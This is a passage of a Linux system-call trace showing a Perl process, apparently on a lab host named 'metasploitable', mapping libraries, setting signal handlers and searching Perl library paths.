\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10617 07:33:52.890289 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10617 07:33:52.890306 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d44000

10617 07:33:52.890317 mmap2(0xb7d4d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d4d000

10617 07:33:52.890331 mmap2(0xb7d4f000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d4f000

10617 07:33:52.890345 close(1)          = 0

10617 07:33:52.890368 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d43000

10617 07:33:52.890381 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d438c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10617 07:33:52.890437 mprotect(0xb7ebf000, 4096, PROT_READ) = 0

10617 07:33:52.890464 munmap(0xb7f07000, 29913) = 0

10617 07:33:52.890476 set_tid_address(0xb7d43908) = 10617

10617 07:33:52.890485 set_robust_list(0xb7d43910, 0xc) = 0

10617 07:33:52.890495 futex(0xbfbb0850, 0x81 /* FUTEX_??? */, 1) = 0

10617 07:33:52.890509 rt_sigaction(SIGRTMIN, {0xb7ec92c0, [], SA_SIGINFO}, NULL, 8) = 0

10617 07:33:52.890522 rt_sigaction(SIGRT_1, {0xb7ec9340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10617 07:33:52.890535 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10617 07:33:52.890548 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10617 07:33:52.890567 uname({sys="Linux", node="metasploitable", ...}) = 0

10617 07:33:52.890578 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10617 07:33:52.890578 brk(0)            = 0x8153000

10617 07:33:52.890578 brk(0x8174000)    = 0x8174000

10617 07:33:52.890579 getuid32()        = 0

10617 07:33:52.890579 geteuid32()       = 0

10617 07:33:52.890583 getgid32()        = 0

10617 07:33:52.890593 getegid32()       = 0

10617 07:33:52.890629 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d22000

10617 07:33:52.890655 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10617 07:33:52.890672 read(1, "\305u-\n", 4) = 4

10617 07:33:52.890688 close(1)          = 0

10617 07:33:52.890706 time(NULL)        = 1495625632

10617 07:33:52.890747 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfbb0520) = -1 ENOENT (No such file or directory)

10617 07:33:52.890768 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfbb0520) = -1 ENOENT (No such file or directory)

10617 07:33:52.890781 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfbb0520) = -1 ENOENT (No such file or directory)

10617 07:33:52.890797 stat64("/usr/local/lib/perl/5.8.7", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890809 stat64("/usr/local/share/perl/5.8.7", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890833 stat64("/usr/local/lib/perl/5.8.6", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890845 stat64("/usr/local/share/perl/5.8.6", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890857 stat64("/usr/local/lib/perl/5.8.4", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890869 stat64("/usr/local/share/perl/5.8.4", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890880 stat64("/usr/local/lib/perl/5.8.3", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890892 stat64("/usr/local/share/perl/5.8.3", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890904 stat64("/usr/local/lib/perl/5.8.2", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890915 stat64("/usr/local/share/perl/5.8.2", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890927 stat64("/usr/local/lib/perl/5.8.1", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890939 stat64("/usr/local/share/perl/5.8.1", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890950 stat64("/usr/local/lib/perl/5.8.0", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890962 stat64("/usr/local/share/perl/5.8.0", 0xbfbb0660) = -1 ENOENT (No such file or directory)

10617 07:33:52.890985 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbb0358) = -1 ENOTTY (Inappropriate ioctl for device)

10617 07:33:52.890998 _llseek(0, 0, [0], SEEK_CUR) = 0

10617 07:33:52.891010 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbb0358) = -1 EBADF (Bad file descriptor)

10617 07:33:52.891020 _llseek(1, 0, 0xbfbb03a0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

10617 07:33:52.891031 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbb0358) = -1 EINVAL (Invalid argument)

10617 07:33:52.891042 _llseek(2, 0, 0xbfbb03a0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

10617 07:33:52.891052 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

10617 07:33:52.891064 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbb0418) = -1 ENOTTY (Inappropriate ioctl for device)

10617 07:33:52.891075 _llseek(1, 0, [0], SEEK_CUR) = 0

